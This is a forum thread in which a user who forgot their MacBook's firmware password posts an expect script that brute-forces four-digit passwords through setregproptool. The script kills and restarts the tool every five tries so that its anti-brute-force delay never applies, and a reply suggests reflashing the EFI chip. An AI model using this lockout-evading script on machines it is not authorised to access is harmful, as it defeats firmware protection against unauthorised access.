- Posts: 2
- Thank you received: 0
Forum Login
Firmware password
Rendering Error in layout Widget/Social: Call to a member function exists() on null. Please enable debug mode for more information.
8 years 9 months ago #776 by nikkikom
Firmware password was created by nikkikom
Hi, Few month ago I set the firmware password on my MacBookAir6,2. That password does not protect the regular booting, but prevents from entering into recovering mode and booting from external media.
Now I realised that I forgot the password. My guess that it was not too complicated, probably consist of a dict word or a word and a number.
As I have regular and admin access to the computer, I was able to copy Firmware Password Utility from Recovery partition. Now I'm thinking about bruteforce solution as this utility does not have any delays on bad passwords.
But anyway it gonna be slow and painful. Is there any ways possible with the root access in my case? Maybe I could get access to password hash and try to brute force it in more powerful ways without gui involved?
Now I realised that I forgot the password. My guess that it was not too complicated, probably consist of a dict word or a word and a number.
As I have regular and admin access to the computer, I was able to copy Firmware Password Utility from Recovery partition. Now I'm thinking about bruteforce solution as this utility does not have any delays on bad passwords.
But anyway it gonna be slow and painful. Is there any ways possible with the root access in my case? Maybe I could get access to password hash and try to brute force it in more powerful ways without gui involved?
Please Log in or Create an account to join the conversation.
8 years 9 months ago - 8 years 9 months ago #778 by nikkikom
Replied by nikkikom on topic Firmware password
Here is expect script that uses setregproptool. It starts setregproptool with "-o password" argument. And then it sends 4 more strings with password. setregproptool has bruteforce checks and insert delays after 4 bad passwords. So I just kill it and restart over after every 5 attempts (including -o argument).
It took 20 minutes on my macbook to check all keys from 0000 to 9999. Ok for those who have 4 (or even 6) digits password.
But too slow for me, 'cause my password is alphnum and much longer.
It took 20 minutes on my macbook to check all keys from 0000 to 9999. Ok for those who have 4 (or even 6) digits password.
But too slow for me, 'cause my password is alphnum and much longer.
#!/opt/local/bin/expect -f
set timeout -1
log_user 0
set p 0
while {$p < 10000} {
set pass [format "%04d" $p]
send_user "$pass\r";
set PID [spawn ./setregproptool -d -o "$pass"]
match_max 100000
expect -exact "Enter current password: "
for {set i 0} {$i < 4} {incr i 1} {
incr p 1
set pass [format "%04d" $p]
send -- "$pass\r"
expect -exact "\r
Enter current password: "
}
exec kill -9 $PID
expect eof
wait -i $spawn_id
} Last edit: 8 years 9 months ago by nikkikom.
Please Log in or Create an account to join the conversation.
8 years 9 months ago #807 by thaGH05T
If I helped you, buy me a beer!!! Happy Hunting...
Replied by thaGH05T on topic Firmware password
The best way is to flash your EFI chip. It will save you all the heart ache.
If I helped you, buy me a beer!!! Happy Hunting...
Please Log in or Create an account to join the conversation.
Who's Online
We have 453 guests and no members online
N00BZ
- ljamal
- ljamal74
- mikeg2atest
- ducchinhbui
- anjarezt
Cookies
EU e-Privacy Directive
This website uses cookies to manage authentication, navigation, and other functions. By using our website, you agree that we can place these types of cookies on your device.
You have declined cookies. This decision can be reversed.
You have allowed cookies to be placed on your computer. This decision can be reversed.